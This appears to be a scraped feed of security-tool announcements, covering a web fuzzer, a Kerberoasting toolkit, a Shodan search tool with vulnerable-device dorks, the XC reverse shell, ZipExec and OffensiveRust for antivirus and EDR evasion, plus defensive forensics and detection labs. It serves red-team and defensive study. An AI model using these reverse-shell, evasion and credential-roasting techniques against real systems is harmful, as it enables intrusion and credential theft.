usage: crawpy.py [-h] [-u URL] [-w WORDLIST] [-t THREADS] [-rc RECURSIVE_CODES] [-rp RECURSIVE_PATHS] [-rd RECURSIVE_DEPTH] [-e EXTENSIONS] [-to TIMEOUT] [-follow] [-ac] [-fc FILTER_CODE] [-fs FILTER_SIZE] [-fw FILTER_WORD] [-fl FILTER_LINE] [-k] [-m MAX_RETRY]
[-H HEADERS] [-o OUTPUT_FILE] [-gr] [-l URL_LIST] [-lt LIST_THREADS] [-s] [-X HTTP_METHOD] [-p PROXY_SERVER]

optional arguments:
-h, --help show this help message and exit
-u URL, --url URL URL
-w WORDLIST, --wordlist WORDLIST
Wordlist
-t THREADS, --threads THREADS
Size of the semaphore pool
-rc RECURSIVE_CODES, --recursive-codes RECURSIVE_CODES
Recursive codes to scan recursively Example: 301,302,307
-rp RECURSIVE_PATHS, --recursive-paths RECURSIVE_PATHS
Recursive paths to scan recursively, please note that only given recursive paths will be scanned initially Example: admin,support,js,backup
-rd RECURSIVE_DEPTH, --recursive-depth RECURSIVE_DEPTH
Recursive scan depth Example: 2
-e EXTENSIONS, --extension EXTENSIONS
Add extensions at the end. Seperate them with comas Example: -x .php,.html,.txt
-to TIMEOUT, --timeout TIMEOUT
Timeouts, I suggest you to not use this option because it is procudes lots of erros now which I was not able to solve why
-follow, --follow-redirects
Follow redirects
-ac, --auto-calibrate
Automatically calibre filter stuff
-fc FILTER_CODE, --filter-code FILTER_CODE
Filter status code
-fs FILTER_SIZE, --filter-size FILTER_SIZE
Filter size
-fw FILTER_WORD, --filter-wo rd FILTER_WORD
Filter words
-fl FILTER_LINE, --filter-line FILTER_LINE
Filter line
-k, --ignore-ssl Ignore untrusted SSL certificate
-m MAX_RETRY, --max-retry MAX_RETRY
Max retry
-H HEADERS, --headers HEADERS
Headers, you can set the flag multiple times.For example: -H "X-Forwarded-For: 127.0.0.1", -H "Host: foobar"
-o OUTPUT_FILE, --output OUTPUT_FILE
Output folder
-gr, --generate-report
If you want crawpy to generate a report, default path is crawpy/reports/<url>.txt
-l URL_LIST, --list URL_LIST
Takes a list of urls as input and runs crawpy on via multiprocessing -l ./urls.txt
-lt LIST_THREADS, --list-threads LIST_THREADS
Number of threads for running crawpy parallely when running with list of urls
-s, --silent Make crawpy not produce output
-X HTTP_METHOD, --http-method HTTP_METHOD
HTTP request method
-p PROXY_SERVER, --proxy PROXY_SERVER
Proxy server, ex: 'http://127.0.0.1:8080'

Examples

python3 crawpy.py -u https://facebook.com/FUZZ -w ./common.txt  -k -ac  -e .php,.html
python3 crawpy.py -u https://google.com/FUZZ -w ./common.txt -k -fw 9,83 -r 301,302 -rd 2
python3 crawpy.py -u https://morph3sec.com/FUZZ -w ./common.txt -e .php,.html -t 20 -ac -k
python3 crawpy.py -u https://google.com/FUZZ -w ./common.txt -ac -gr
python3 crawpy.py -u https://google.com/FUZZ -w ./common.txt -ac -gr -o /tmp/test.txt
sudo python3 crawpy.py -l urls.txt -lt 20 -gr -w ./common.txt -t 20 -o custom_reports -k -ac -s
python3 crawpy.py -u https://google.com/FUZZ -w ./common.txt -ac -gr -rd 1 -rc 302,301 -rp admin,backup,support -k


Kerberoast - Kerberoast Attack -Pure Python-

2 December 2021 at 11:30
By: Zion3R


Kerberos attack toolkit -pure python-Β 


Install

pip3 install kerberoast

Prereqirements

Python 3.6 See requirements.txt

For the impatient

IMPORTANT: the accepted target url formats for LDAP and Kerberos are the following
<ldap_connection_url> : <protocol>+<auth-type>://<domain>\<user>:<password>@<ip_or_hostname>/?<param1>=<value1>
<kerberos_connection_url>: <protocol>+<auth-type>://<domain>\<user>:<password>@<ip_or_hostname>/?<param1>=<value1>

Steps -with SSPI-: kerberoast auto <DC_ip>

Steps -SSPI not used-:

  1. Look for vulnerable users via LDAP
    kerberoast ldap all <ldap_connection_url> -o ldapenum
  2. Use ASREP roast against users in the ldapenum_asrep_users.txt file
    kerberoast asreproast <DC_ip> -t ldapenum_asrep_users.txt
  3. Use SPN roast against users in the ldapenum_spn_users.txt file
    kerberoast spnroast <kerberos_connection_url> -t ldapenum_spn_users.txt
  4. Crack SPN roast and ASPREP roast output with hashcat

Commands

ldap

This command group is for enumerating potentially vulnerable users via LDAP.

Command structure

Β Β Β Β kerberoast ldap <type> <ldap_connection_url> <options>

Type: It supports three types of users to be enumerated

  1. spn Enumerates users with servicePrincipalName attribute set.
  2. asrep Enumerates users with DONT_REQ_PREAUTH flag set in their UAC attribute.
  3. all Startes all the above mentioned enumerations.

ldap_connection_url: Specifies the usercredential and the target server in the msldap url format (see help)

options:
Β Β Β Β -o: Output file base name

brute

This command is to perform username enumeration by brute-forcing the kerberos service with possible username candidates

Command structure

Β Β Β Β kerberoast brute <realm> <dc_ip> <targets> <options>

realm: The kerberos realm usually looks like COMPANY.corp
dc_ip: IP or hostname of the domain controller
targets: Path to the file which contains the possible username candidates
options:
Β Β Β Β -o: Output file base name

asreproast

This command is to perform ASREProast attack

Command structure

Β Β Β Β kerberoast asreproast <dc_ip> <options>

dc_ip: IP or hostname of the domain controller
options:
Β Β Β Β -r: Specifies the kerberos realm to be used. It overrides all other realm info.
Β Β Β Β -o: Output file base name
Β Β Β Β -t: Path to the file which contains the usernames to perform the attack on
Β Β Β Β -u: Specifies the user to perform the attack on. Format is either <username> or <username>@<realm> but in the first case, the -r option must be used to specify the realm

spnroast

This command is to perform SPNroast (AKA kerberoast) attack.

Command structure

Β Β Β Β kerberoast spnroast <kerberos_connection_url> <options>

kerberos_connection_url: Specifies the usercredential and the target server in the kerberos URL format (see help)

options:
Β Β Β Β -r: Specifies the kerberos realm to be used. It overrides all other realm info.
Β Β Β Β -o: Output file base name
Β Β Β Β -t: Path to the file which contains the usernames to perform the attack on
Β Β Β Β -u: Specifies the user to perform the attack on. Format is either <username> or <username>@<realm> but in the first case, the -r option must be used to specify the realm



ShonyDanza - A Customizable, Easy-To-Navigate Tool For Researching, Pen Testing, And Defending With The Power Of Shodan

1 December 2021 at 20:30
By: Zion3R


A customizable, easy-to-navigate tool for researching, pen testing, and defending with the power of Shodan.


With ShonyDanza, you can:

  • Obtain IPs based on search criteria
  • Automatically exclude honeypots from the results based on your pre-configured thresholds
  • Pre-configure all IP searches to filter on your specified net range(s)
  • Pre-configure search limits
  • Use build-a-search to craft searches with easy building blocks
  • Use stock searches and pre-configure your own stock searches
  • Check if IPs are known malware C2s
  • Get host and domain profiles
  • Scan on-demand
  • Find exploits
  • Get total counts for searches and exploits
  • Automatically save exploit code, IP lists, host profiles, domain profiles, and scan results to directories within ShonyDanza

Installation

git clone https://github.com/fierceoj/ShonyDanza.git

Requirements

  • python3
  • shodan library

cd ShonyDanza
pip3 install -r requirements.txt

Usage

Edit config.py to include your desired configurations
cd configs
sudo nano config.py

#config file for shonydanza searches

#REQUIRED
#maximum number of results that will be returned per search
#default is 100

SEARCH_LIMIT = 100


#REQUIRED
#IPs exceeding the honeyscore limit will not show up in IP results
#scale is 0.0 to 1.0
#adjust to desired probability to restrict results by threshold, or keep at 1.0 to include all results

HONEYSCORE_LIMIT = 1.0


#REQUIRED - at least one key: value pair
#add a shodan dork to the dictionary below to add it to your shonydanza stock searches menu
#see https://github.com/jakejarvis/awesome-shodan-queries for a great source of queries
#check into "vuln:" filter if you have Small Business Plan or higher (e.g., vuln:cve-2019-11510)

STOCK_SEARCHES = {
'ANONYMOUS_FTP':'ftp anonymous ok',
'RDP':'port:3389 has_screenshot:true',
'OPEN_TELNET':'port:23 console gateway -password',
'APACHE_DIR_LIST':'http.title:"Index of / "',
'SPRING_BOOT':'http.favicon.hash:116323821',
'HP_PRINTERS':'"Serial Number:" "Built:" "Server: HP HTTP"',
'DOCKER_API':'"Docker Containers:" port:2375',
'ANDROID_ROOT_BRIDGE':'"Android Debug Bridge" "Device" port:5555',
'MONGO_EXPRESS_GUI':'"Set-Cookie: mongo-express=" "200 OK"',
'CVE-2019-11510_PULSE_VPN':'http.html:/dana-na/',
'CVE-2019-19781_CITRIX_NETSCALER':'http.waf:"Citrix NetScaler"',
'CVE-2020-5902_F5_BIGIP':'http.favicon.hash:-335242539 "3992"',
'CVE-2020-3452_CISCO_ASA_FTD':'200 "Set-Cookie: webvpn;"'
}


#OPTIONAL
#IP or cidr range constraint for searches that return list of IP addresses
#use comma-separated list to designate multiple (e.g. 1.1.1.1,2.2.0.0/16,3.3.3.3,3.3.3.4)

#NET_RANGE = '0.0.0.0/0'

Run
cd ../
python3 shonydanza.py

See this how-to article for additional usage instruction.

Legal Disclaimer

This project is made for educational and ethical testing purposes only. Usage of ShonyDanza for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.



XC - A Small Reverse Shell For Linux And Windows

1 December 2021 at 11:30
By: Zion3R


Netcat like reverse shell for Linux & Windows.


Features

Windows

Usage:
β”” Shared Commands: !exit
!upload <src> <dst>
* uploads a file to the target
!download <src> <dst>
* downloads a file from the target
!lfwd <localport> <remoteaddr> <remoteport>
* local portforwarding (like ssh -L)
!rfwd <remoteport> <localaddr> <localport>
* remote portforwarding (like ssh -R)
!lsfwd
* lists active forwards
!rmfwd <index>
* removes forward by index
!plugins
* lists available plugins
!plugin <plugin>
* execute a plugin
!spawn <port>
* spawns another client on the specified port
!shell
* runs /bin/sh
!runas <username> <password> <domain>
* restart xc with the specified user
!met <port>
* connects to a x64/meterpreter/reverse_tcp listener
β”” OS Specific Commands:
!powe rshell
* starts powershell with AMSI Bypass
!rc <port>
* connects to a local bind shell and restarts this client over it
!runasps <username> <password> <domain>
* restart xc with the specified user using powershell
!vulns
* checks for common vulnerabilities

Linux

Usage:
β”” Shared Commands: !exit
!upload <src> <dst>
* uploads a file to the target
!download <src> <dst>
* downloads a file from the target
!lfwd <localport> <remoteaddr> <remoteport>
* local portforwarding (like ssh -L)
!rfwd <remoteport> <localaddr> <localport>
* remote portforwarding (like ssh -R)
!lsfwd
* lists active forwards
!rmfwd <index>
* removes forward by index
!plugins
* lists available plugins
!plugin <plugin>
* execute a plugin
!spawn <port>
* spawns another client on the specified port
!shell
* runs /bin/sh
!runas <username> <password> <domain>
* restart xc with the specified user
!met <port>
* connects to a x64/meterpreter/reverse_tcp listener
β”” OS Specific Commands:
!ssh < port>
* starts sshd with the configured keys on the specified port

Examples

  • Linux Attacker: rlwrap xc -l -p 1337 (Server)
  • WindowsVictim : xc.exe 10.10.14.4 1337 (Client)
  • Argumentless: xc_10.10.14.4_1337.exe (Client)

Setup

Make sure you are running golang version 1.15+, older versions will not compile. I tested it on ubuntu: go version go1.16.2 linux/amd64 and kali go version go1.15.9 linux/amd64

git clone --recurse-submodules https://github.com/xct/xc.git

GO111MODULE=off go get golang.org/x/sys/...
GO111MODULE=off go get golang.org/x/text/encoding/unicode
GO111MODULE=off go get github.com/hashicorp/yamux
sudo apt-get install rlwrap upx

Linux:

python3 build.py

Known Issues

  • When !lfwd fails due to lack of permissions (missing sudo), the entry in !lsfwd is still created
  • Can't Ctrl+C out of powershell started from !shell
  • !net (execute-assembly) fails after using it a few times - for now you can !restart and it might work again
  • Tested:
    • Kali (Attacker) Win 10 (Victim)

Credits



ZipExec - A Unique Technique To Execute Binaries From A Password Protected Zip

30 November 2021 at 20:30
By: Zion3R


ZipExec is a Proof-of-Concept (POC) tool to wrap binary-based tools into a password-protected zip file. This zip file is then base64 encoded into a string that is rebuilt on disk. This encoded string is then loaded into a JScript file that when executed, would rebuild the password-protected zip file on disk and execute it. This is done programmatically by using COM objects to access the GUI-based functions in Windows via the generated JScript loader, executing the loader inside the password-protected zip without having to unzip it first. By password protecting the zip file, it protects the binary from EDRs and disk-based or anti-malware scanning mechanisms.


Installation

The first step as always is to clone the repo. Before you compile ZipExec you'll need to install the dependencies. To install them, run following commands:

go get github.com/yeka/zip

Then build it

go build ZipExec.go

or

go get github.com/Tylous/ZipExec

Help

sandbox evasion using IsDomainedJoined. ">
./ZipExec -h

__________.__ ___________
\____ /|__|_____\_ _____/__ ___ ____ ____
/ / | \____ \| __)_\ \/ // __ \_/ ___\
/ /_ | | |_> > \> <\ ___/\ \___
/_______ \|__| __/_______ /__/\_ \\___ >\___ >
\/ |__| \/ \/ \/ \/
(@Tyl0us)

Usage of ./ZipExec:
-I string
Path to the file containing binary to zip.
-O string
Name of output file (e.g. loader.js)
-sandbox
Enables sandbox evasion using IsDomainedJoined.


Kit_Hunter - A Basic Phishing Kit Scanner For Dedicated And Semi-Dedicated Hosting

30 November 2021 at 11:30
By: Zion3R


Kit Hunter: A basic phishing kit detection tool

  • Version 2.6.0
  • 28 September 2021

Testing and development took place on Python 3.7.3 (Linux)


What is Kit Hunter?

Kit Hunter is a personal project to learn Python, and a basic scanning tool that will search directories and locate phishing kits based on established markers. As detection happens, a report is generated for administrators.

By default the script will generate a report that shows the files that were detected as potentially problematic, list the markers that indicated them as problematic (a.k.a. tags), and then show the exact line of code where the detection happened.

Usage:

Detailed installation and usage instructions are available at SteveD3.io

Help

To get quick help: python3 kit_hunter_2.py -h

Default scan

To launch a full scan using the default settings: python3 kit_hunter_2.py

Quick scan

To launch a quick scan, using minimal detection rules: python3 kit_hunter_2.py -q

Custom scan

To launch a custom scan: python3 kit_hunter_2.py -c

Note: When using the -c switch, you must place a tag file in the same location as Kit Hunter. You can name this file whatever you want, but the extension must be .tag. Please remember that the formatting is important. There should only be one item per line, and no whitespaces. You can look at the other tag files if you need examples.

Directory selected scanning

You can run kit_hunter_2.py from any location using the -d switch to select a directory to scan:

python3 kit_hunter_2.py -d /path/to/directory

However, it is easier if you place kit_hunter_2.py in the directory above your web root (e.g. /www/ or /public_html/) and call the script from there.

The final report will be generated in the directory being scanned.

In my usage, I call Kit Hunter from my /kit/download/ directory where new phishing kits are saved. My reports are then generated and saved to that folder. However, if I call Kit Hunter and scan my /PHISHING/Archive/ folder using the -d switch, then the report will save to /PHISHING/Archive/.

Shell detection

This latest release of Kit Hunter comes with shell detection. Shell scripts are often packaged with phishing kits, or used to deploy phishing kits on webservers. Kit Hunter will scan for some common shell script elements. The process works exactly the same way as regular scanning, only the shell detections are called with the -s switch. This is a standalone scan, so you can't run it with other types. You can however leverage the -m and -l flags with shell scanning. See the script's help section for more details.

Once scanning is complete, output from the script will point you to the location of the saved scan report.

Tag Files:

When it comes to the tag files, there are 41 tag files shipping with v2.5.8 Kit Hunter. These tag files detect targeted phishing campaigns, as well as various types of phishing tricks, such as obfuscation, templating, theming, and even branded kits like Kr3pto and Ex-Robotos. New tag files will be added, and existing tag files will be updated on a semi-regular basis. See the changelog for details.

As was the case with v1.0, the longer the tag file is, the longer it will take for the script to read it.



Digital-Forensics-Lab - Free Hands-On Digital Forensics Labs For Students And Faculty

29 November 2021 at 20:30
By: Zion3R


Features of Repository

===================

  • Hands-on Digital Forensics Labs: designed for Students and Faculty
  • Linux-based lab: All labs are purely based on Kali Linux
  • Lab screenshots: Each lab has PPTs with instruction screenshots
  • Comprehensive: Cover many topics in digital forensics
  • Free: All tools are open source
  • Updated: The project is funded by DOJ and will keep updating
  • Two formalized forensic intelligence in JSON files based-on case studies

Table of Contents (updating)

# The following commands will install all tools needed for Data Leakage Case. We will upgrade the script to add more tools for other labs soon.

wget https://raw.githubusercontent.com/frankwxu/digital-forensics-lab/main/Help/tool-install-zsh.sh
chmod +x tool-install-zsh.sh
./tool-install-zsh.sh


Investigating P2P Data Leakage

==============

The P2P data leakage case study is to help students to apply various forensic techniques to investigate intellectual property theft involving P2P. The study include

  • A large and complex case involving a uTorrent client. The case is similar to NIST data leakage lab. However, it provides a clearer and more detailed timeline.
  • Solid evidence with explanations. Each evidence that is associated with each activity is explained along with the timeline. We suggest using this before study NIST data leakage case study.
  • 10 hands-on labs/topics in digital forensics

Topics Covered

Labs Topics Covered Size of PPTs
Lab 0 Lab Environment Setting Up 4M
Lab 1 Disk Image and Partitions 5M
Lab 2 Windows Registry and File Directory 15M
Lab 3 MFT Timeline 6M
Lab 4 USN Journal Timeline 3M
Lab 5 uTorrent Log File 9M
Lab 6 File Signature 8M
Lab 7 Emails 9M
Lab 8 Web History 11M
Lab 9 Website Analysis 2M
Lab 10 Timeline (Summary) 13K

Investigating NIST Data Leakage

==============

The case study is to investigate an image involving intellectual property theft. The study include

  • A large and complex case study created by NIST. You can access the Senario, DD/Encase images. You can also find the solutions on their website.
  • 14 hands-on labs/topics in digital forensics

Topics Covered

Labs Topics Covered Size of PPTs
Lab 0 Environment Setting Up 2M
Lab 1 Windows Registry 3M
Lab 2 Windows Event and XML 3M
Lab 3 Web History and SQL 3M
Lab 4 Email Investigation 3M
Lab 5 File Change History and USN Journal 2M
Lab 6 Network Evidence and shellbag 2M
Lab 7 Network Drive and Cloud 5M
Lab 8 Master File Table ($MFT) and Log File ($logFile) Analysis 13M
Lab 9 Windows Search History 4M
Lab 10 Windows Volume Shadow Copy Analysis 6M
Lab 11 Recycle Bin and Anti-Forensics 3M
Lab 12 Data Carving 3M
Lab 13 Crack Windows Passwords 2M

Investigating Illegal Possession of Images

=====================

The case study is to investigate the illegal possession of Rhino images. This image was contributed by Dr. Golden G. Richard III, and was originally used in the DFRWS 2005 RODEO CHALLENGE. NIST hosts the USB DD image. A copy of the image is also available in the repository.

Topics Covered

Labs Topics Covered Size of PPTs
Lab 0 HTTP Analysis using Wireshark (text) 3M
Lab 1 HTTP Analysis using Wireshark (image) 6M
Lab 2 Rhion Possession Investigation 1: File recovering 9M
Lab 3 Rhion Possession Investigation 2: Steganography 4M
Lab 4 Rhion Possession Investigation 3: Extract Evidence from FTP Traffic 3M
Lab 5 Rhion Possession Investigation 4: Extract Evidence from HTTP Traffic 5M

Investigating Email Harassment

=========

The case study is to investigate the harassment email sent by a student to a faculty member. The case is hosted by digitalcorpora.org. You can access the senario description and network traffic from their website. The repository only provides lab instructions.

Topics Covered

Labs Topics Covered Size of PPTs
Lab 0 Investigating Harassment Email using Wireshark 3M
Lab 1 t-shark Forensic Introduction 2M
Lab 2 Investigating Harassment Email using t-shark 2M

Investigating Illegal File Transferring (Memory Forensics )

=========

The case study is to investigate computer memory for reconstructing a timeline of illegal data transferring. The case includes a scenario of transfer sensitive files from a server to a USB.

Topics Covered

Labs Topics Covered Size of PPTs
Lab 0 Memory Forensics 11M
part 1 Understand the Suspect and Accounts
part 2 Understand the Suspect’s PC
part 3 Network Forensics
part 4 Investigate Command History
part 5 Investigate Suspect’s USB
part 6 Investigate Internet Explorer History
part 7 Investigate File Explorer History
part 8 Timeline Analysis

Investigating Hacking Case

=========

The case study, including a disk image provided by NIST is to investigate a hacker who intercepts internet traffic within range of Wireless Access Points.

Topics Covered

Labs Topics Covered Size of PPTs
Lab 0 Hacking Case 8M

Investigating Android 10

The image is created by Joshua Hickman and hosted by digitalcorpora.

=========

Labs Topics Covered Size of PPTs
Lab 0 Intro Pixel 3 3M
Lab 1 Pixel 3 Image 2M
Lab 2 Pixel 3 Device 4M
Lab 3 Pixel 3 System Setting 5M
Lab 4 Overview: App Life Cycle 11M
Lab 5.1.1 AOSP App Investigations: Messaging 4M
Lab 5.1.2 AOSP App Investigations: Contacts 3M
Lab 5.1.3 AOSP App Investigations: Calendar 1M
Lab 5.2.1 GMS App Investigations: Messaging 6M
Lab 5.2.2 GMS App Investigations: Dialer 2M
Lab 5.2.3 GMS App Investigations: Maps 8M
Lab 5.2.4 GMS App Investigations: Photos 6M
Lab 5.3.1 Third-Party App Investigations: Kik 4M
Lab 5.3.2 Third-Party App Investigations: textnow 1M
Lab 5.3.3 Third-Party App Investigations: whatapp 3M
Lab 6 Pixel 3 Rooting 5M

Tools Used

========

Name version vendor
Wine 6.0 https://source.winehq.org/git/wine.git/
Vinetto 0.98 https://github.com/AtesComp/Vinetto
imgclip 05.12.2017 https://github.com/Arthelon/imgclip
Tree 06.01.2020 https://github.com/kddeisz/tree
RegRipper 3.0 https://github.com/keydet89/RegRipper3.0
Windows-Prefetch-Parser 05.01.2016 https://github.com/PoorBillionaire/Windows-Prefetch-Parser.git
python-evtx 05.21.2020 https://github.com/williballenthin/python-evtx
xmlstarlet 1.6.1 https://github.com/fishjam/xmlstarlet
hivex 09.15.2020 https://github.com/libguestfs/hivex
libesedb 01.01.2021 https://github.com/libyal/libesedb
pasco-project 02.09.2017 https://annsli.github.io/pasco-project/
libpff 01.17.2021 https://github.com/libyal/libpff
USN-Record-Carver 05.21.2017 https://github.com/PoorBillionaire/USN-Record-Carver
USN-Journal-Parser 1212.2018 https://github.com/PoorBillionaire/USN-Journal-Parser
JLECmd 1.4.0.0 https://f001.backblazeb2.com/file/EricZimmermanTools/JLECmd.zip
libnl-utils 3.2.27 https://packages.ubuntu.com/xenial/libs/libnl-utils
time_decode 12.13.2020 https://github.com/digitalsleuth/time_decode
analyzeMFT 2.0.4 https://github.com/dkovar/analyzeMFT
libvshadow 12.20.2020 https://github.com/libyal/libvshadow
recentfilecache-parser 02.13.2018 https://github.com/prolsen/recentfilecache-parser

Contribution

=============

  • Frank Xu
  • Malcolm Hayward
  • Richard (Max) Wheeless

Free hands-on digital forensics labs for students and faculty (3)



OffensiveRust - Rust Weaponization For Red Team Engagements

29 November 2021 at 11:30
By: Zion3R


My experiments in weaponizing Rust for implant development and general offensive operations.


Why Rust?

  • It is faster than languages like C/C++
  • It is multi-purpose language, bearing excellent communities
  • It has an amazing inbuilt dependency build management called Cargo
  • It is LLVM based which makes it a very good candidate for bypassing static AV detection
  • Super easy cross compilation to Windows from *nix/MacOS, only requires you to install the mingw toolchain, although certain libraries cannot be compiled successfully in other OSes.

Examples in this repo

File Description
Allocate_With_Syscalls It uses NTDLL functions directly with the ntapi Library
Create_DLL Creates DLL and pops up a msgbox, Rust does not fully support this so things might get weird since Rust DLL do not have a main function
DeviceIoControl Opens driver handle and executing DeviceIoControl
EnableDebugPrivileges Enable SeDebugPrivilege in the current process
Shellcode_Local_inject Executes shellcode directly in local process by casting pointer
Execute_With_CMD Executes cmd by passing a command via Rust
ImportedFunctionCall It imports minidump from dbghelp and executes it
Kernel_Driver_Exploit Kernel Driver exploit for a simple buffer overflow
Named_Pipe_Client Named Pipe Client
Named_Pipe_Server Named Pipe Server
Process_Injection_CreateThread Process Injection in remote process with CreateRemoteThread
Unhooking Unhooking calls
asm_syscall Obtaining PEB address via asm
base64_system_enum Base64 encoding/decoding strings
http-https-requests HTTP/S requests by ignoring cert check for GET/POST
patch_etw Patch ETW
ppid_spoof Spoof parent process for created process
tcp_ssl_client TCP client with SSL that ignores cert check (Requires openssl and perl to be installed for compiling)
tcp_ssl_server TCP Server, with port parameter(Requires openssl and perl to be installed for compiling)
wmi_execute Executes WMI query to obtain the AV/EDRs in the host
Windows.h+ Bindings This file contains structures of Windows.h plus complete customized LDR,PEB,etc.. that are undocumented officially by Microsoft, add at the top of your file include!("../bindings.rs");
UUID_Shellcode_Execution Plants shellcode from UUID array into heap space and uses EnumSystemLocalesA Callback in order to execute the shellcode.

Compiling the examples in this repo

This repository does not provide binaries, you're gonna have to compile them yourself.

Install Rust
Simply download the binary and install.

This repo was compiled in Windows 10 so I would stick to it. As mentioned OpenSSL binaries will have depencency issues that will require OpenSSL and perl to be installed. For the TCP SSL client/server I recommend static build due to dependencies on the hosts you will execute the binaries. For creating a project, execute:
cargo new <name> This will automatically create the structured project folders with:

project
β”œβ”€β”€ Cargo.toml
└── src
└── main.rs

Cargo.toml is the file that contains the dependencies and the configuration for the compilation. main.rs is the main file that will be compiled along with any potential directories that contain libraries.

For compiling the project, go into the project directory and execute:
cargo build

This will use your default toolchain. If you want to build the final "release" version execute:
cargo build --release

For static binaries, in terminal before the build command execute:
"C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Auxiliary\Build\vcvars64.bat"
set RUSTFLAGS=-C target-feature=+crt-static

In case it does not feel easy for you to read my code the way it is written,
you can also you the below command inside the project directory to format it in a better way
cargo fmt

Certain examples might not compile and give you some error, since it might require a nightly
build of Rust with the latest features. To install it just do:
rustup default nightly

The easiest place to find the dependencies or Crates as they are called.

Cross Compiling

Cross-Compiling requires to follow the instructions here By installing different toolchains, you can cross compile with the below command
cargo build --target <toolchain>

To see the installed toolchains on your system do:
rustup toolchain list

For checking all the available toolchains you can install in your system do:
rustup target list

For installing a new toolchain do:
rustup target add <toolchain_name>

Optimizing executables for size

This repo contains a lot of configuration options and ideas about reducing the file size. Static binaries are usually quite big.

Pitfalls I found myself falling into

Careful of \0 bytes, do not forget them for strings in memory, I spent a lot of my time but windbg always helped resolving it.

Interesting Rust libraries

  • WINAPI
  • WINAPI2
  • Windows - This is the official Microsoft one that I have not played much with

OPSEC

  • Even though Rust has good advantages it is quite difficult to get used to it and it ain't very intuitive.
  • Shellcode generation is another issue due to LLVM. I have found a few ways to approach this.
    Donut sometimes does generate shellcode that works but depending on how the project is made, it might not.
    In general, for shellcode generation the tools that are made should be made to host all code in .text segment, which leads to this amazing repo. There is a shellcode sample in this project that can show you how to structure your code for successfull shellcode generation.
    In addition, this project also has a shellcode generator that grabs the .text segment of a binary and and dumps the shellcode after executing some patches.
    This project grabs from a specific location the binary so I made a fork that receives the path of the binary as an argument here.
  • Even if you remove all debug symbols, rust can still keep references to your home directory in the binary. The only way I've found to remove this is to pass the following flag: --remap-path-prefix {your home directory}={some random identifier}. You can use bash variables to get your home directory and generate a random placeholder: --remap-path-prefix "$HOME"="$RANDOM". (By Yamakadi)
  • Although for the above there is another way to remove info about the home directory by adding at the top of Cargo.toml
    cargo-features = ["strip"] .
  • Since Rust by default leaves a lot of things as strings in the binary, I mostly use this cargo.toml to avoid them and also reduce size
    with build command
    cargo build --release -Z build-std=std,panic_abort -Z build-std-features=panic_immediate_abort --target x86_64-pc-windows-msvc

Other projects I have have made in Rust

Projects in Rust that can be hepfull

  • houdini - Helps make your executable self-delete


DetectionLabELK - A Fork From DetectionLab With ELK Stack Instead Of Splunk

28 November 2021 at 20:30
By: Zion3R


DetectionLabELK is a fork from Chris Long's DetectionLab with ELK stack instead of Splunk.


Description:

DetectionLabELK is the perfect lab to use if you would like to build effective detection capabilities. It has been designed with defenders in mind. Its primary purpose is to allow blueteams to quickly build a Windows domain that comes pre-loaded with security tooling and some best practices when it comes to system logging configurations. It can easily be modified to fit most needs or expanded to include additional hosts.

Use cases:

A popular use case for DetectionLabELK is when you consider adopting MITRE ATT&CK framework and would like to develop detections for its tactics. You can use DetectionLabELK to quickly run atomic tests, see what logs are being generated and compare it to your production environment. This way you can:

  • Validate that your production logging is working as expected.
  • Ensure that your SIEM is collecting the correct events.
  • Enhance alerts quality by reducing false positives and eliminating false negatives.
  • Minimize coverage gaps.

Lab Information:

Primary Lab Features:

  • Microsoft Advanced Threat Analytics is installed on the WEF machine, with the lightweight ATA gateway installed on the DC
  • Windoes Evenet forwarder along with Winlogbeat are pre-installed and all indexes are pre-created on ELK. Technology add-ons for Windows are also preconfigured.
  • A custom Windows auditing configuration is set via GPO to include command line process auditing and additional OS-level logging
  • Palantir's Windows Event Forwarding subscriptions and custom channels are implemented
  • Powershell transcript logging is enabled. All logs are saved to \\wef\pslogs
  • osquery comes installed on each host and is pre-configured to connect to a Fleet server via TLS. Fleet is preconfigured with the configuration from Palantir's osquery Configuration
  • Sysmon is installed and configured using Olaf's open-sourced configuration
  • All autostart items are logged to Windows Event Logs via AutorunsToWinEventLog
  • SMBv1 Auditing is enabled

Lab Hosts:

  1. DC - Windows 2016 Domain Controller

    • WEF Server Configuration GPO
    • Powershell logging GPO
    • Enhanced Windows Auditing policy GPO
    • Sysmon
    • osquery
    • Elastic Beats Forwarder (Forwards Sysmon & osquery)
    • Sysinternals Tools
    • Microsft Advanced Threat Analytics Lightweight Gateway
  2. WEF - Windows 2016 Server

    • Microsoft Advanced Threat Analytics
    • Windows Event Collector
    • Windows Event Subscription Creation
    • Powershell transcription logging share
    • Sysmon
    • osquery
    • Elastic Beats Forwarder (Forwards WinEventLog & Powershell & Sysmon & osquery)
    • Sysinternals tools
  3. Win10 - Windows 10 Workstation

    • Simulates employee workstation
    • Sysmon
    • osquery
    • Sysinternals Tools
  4. Logger - Ubuntu 18.04

    • Kibana
    • Fleet osquery Manager
    • Bro
    • Suricata
    • Elastic Beats Forwarder (Forwards Bro logs & Suricata & osquery)
    • Guacamole
    • Velociraptor

Requirements

  • 55GB+ of free disk space
  • 16GB+ of RAM
  • Vagrant 2.2.2 or newer
  • Virtualbox

Deployment Options

  1. Use Vagrant Cloud Boxes - ETA ~2 hours.

    • Install Vagrant on your system.
    • Install Packer on your system.
    • Install the Vagrant-Reload plugin by running the following command: vagrant plugin install vagrant-reload.
    • Download DetectionLabELK to your local machine by running git clone https://github.com/cyberdefenders/DetectionLabELK.git from command line OR download it directly via this link.
    • cd to "DetectionLabELK/Vagrant" and execute vagrant up.
  2. Build Boxes From Scratch - ETA ~5 hours.

    • Install Vagrant on your system.
    • Install Packer on your system.
    • Install "Vagrant-Reload" plugin by running the following command: vagrant plugin install vagrant-reload.
    • Download DetectionLabELK to your local machine by running git clone https://github.com/cyberdefenders/DetectionLabELK.git from command line OR download it directly via this link.
    • cd to "DetectionLabELK" base directory and build the lab by executing ./build.sh virtualbox (Mac & Linux) or ./build.ps1 virtualbox (Windows).

Troubleshooting:

  • To verify that building process completed successfully, ensure you are in DetectionLabELK/Vagrant directory and run vagrant status. The four machines (wef,dc,logger and win10) should be running. if one of the machines was not running, execute vagrant reload <host>. If you would like to pause the whole lab, execute vagrant suspend and resume it using vagrant resume.
  • Deployment logs will be present in the Vagrant folder as vagrant_up_<host>.log

Lab Access:

Support: If you face any problem, please open a new issue and provide relevant log file.



4-ZERO-3 - 403/401 Bypass Methods + Bash Automation

28 November 2021 at 11:30
By: Zion3R


>_ Introduction

